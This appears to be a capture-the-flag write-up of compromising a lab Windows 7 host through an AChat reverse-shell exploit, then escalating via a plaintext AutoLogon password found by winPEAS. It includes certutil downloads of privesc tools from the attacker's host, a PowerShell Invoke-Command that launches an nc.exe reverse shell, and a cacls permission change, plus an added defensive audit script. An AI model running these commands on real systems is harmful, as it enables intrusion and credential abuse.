Author: Twe1ve (core member, Beta Security Lab)
nmap scan results:
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
AChat exploit: https://www.youtube.com/watch?v=YgC_Rl6x3aM
1. Generate the payload
kali@kali:~/tools/others/AChat-Reverse-TCP-Exploit$ bash AChat_Payload.sh
RHOST: 10.10.10.74
LPORT: 4444
LHOST: 10.10.14.61
2. Replace the payload in the Python script with the generated one, and change server_address
3. msf
use exploit/multi/handler
set payload windows/shell/reverse_tcp
...
4. python AChat_Exploit.py
### This gives a user shell; post/multi/manage/shell_to_meterpreter ### upgrades it to a Meterpreter shell, but the upgrade failed here
The MSF exploit suggester could not find any usable privilege-escalation module, so try a privesc script instead.
Since the target is Windows 7, try downloading the tools with certutil:
certutil.exe -urlcache -split -f http://10.10.14.61:8000/winPEAS.exe 1.exe
certutil.exe -urlcache -split -f http://10.10.14.61:8000/ms16-075.exe 2.exe
certutil.exe -urlcache -split -f http://10.10.14.61:8000/41015.exe 3.exe
.....
All the privesc exploits failed.
winPEAS:
Some AutoLogon credentials were found!!
DefaultUserName : Alfred
DefaultPassword : Welcome1!
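The finding above is a clear-text AutoLogon password in the Winlogon registry key, which any local user can read. As an added defender-side check that is not part of the original writeup, the following PowerShell function (hypothetical name Test-AutoLogonSecret) audits that key and, with -Remediate, removes the stored password and disables AutoLogon:

```powershell
# Added audit example, not code from the original writeup.
# Reads the same Winlogon key winPEAS reports on and flags a stored clear-text password.
function Test-AutoLogonSecret {
    param([switch]$Remediate)

    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    # HKLM\SOFTWARE is readable by every local account, so a DefaultPassword stored
    # here is effectively exposed to any low-privileged shell on the host.
    $wl = Get-ItemProperty -Path $key -ErrorAction Stop

    $hasPassword = -not [string]::IsNullOrEmpty($wl.DefaultPassword)
    $result = New-Object PSObject -Property @{
        AutoAdminLogon    = $wl.AutoAdminLogon
        DefaultUserName   = $wl.DefaultUserName
        DefaultDomainName = $wl.DefaultDomainName
        ClearTextPassword = $hasPassword
        Remediated        = $false
    }

    if ($hasPassword) {
        Write-Warning ("Clear-text AutoLogon password stored for user '{0}'" -f $wl.DefaultUserName)
        if ($Remediate) {
            # Drop the value and switch AutoLogon off (needs an elevated shell).
            # Any other account sharing this password still needs a reset; if AutoLogon
            # is genuinely required, Sysinternals Autologon stores it as an LSA secret instead.
            Remove-ItemProperty -Path $key -Name DefaultPassword
            Set-ItemProperty -Path $key -Name AutoAdminLogon -Value '0'
            $result.Remediated = $true
        }
    }
    return $result
}

# Read-only audit by default; add -Remediate to clean the key.
Test-AutoLogonSecret | Format-List
```

The audit runs as any user; the remediation branch needs administrative rights on the host.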
Try the password against other accounts (what I did not expect was that this Win 7 box actually had PowerShell installed):
$pass = convertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred= New-Object System.Management.Automation.PSCredential("Administrator",$pass)
Invoke-Command -Computer Sniper -ScriptBlock { whoami } -Credential $cred ### verify that the credential is valid
Invoke-Command -Computer Sniper -ScriptBlock { dir } -Credential $cred
Invoke-Command -Computer Sniper -ScriptBlock { C:\ProgramData\nc.exe 10.10.15.64 9999 -e cmd.exe } -Credential $cred
Another approach:
#### Reading root.txt directly only returns access denied for the user, so you can change the file permissions on root.txt to make it readable
cacls.exe c:\users\Administrator\Desktop\root.txt /c /e /t /g Alfred:F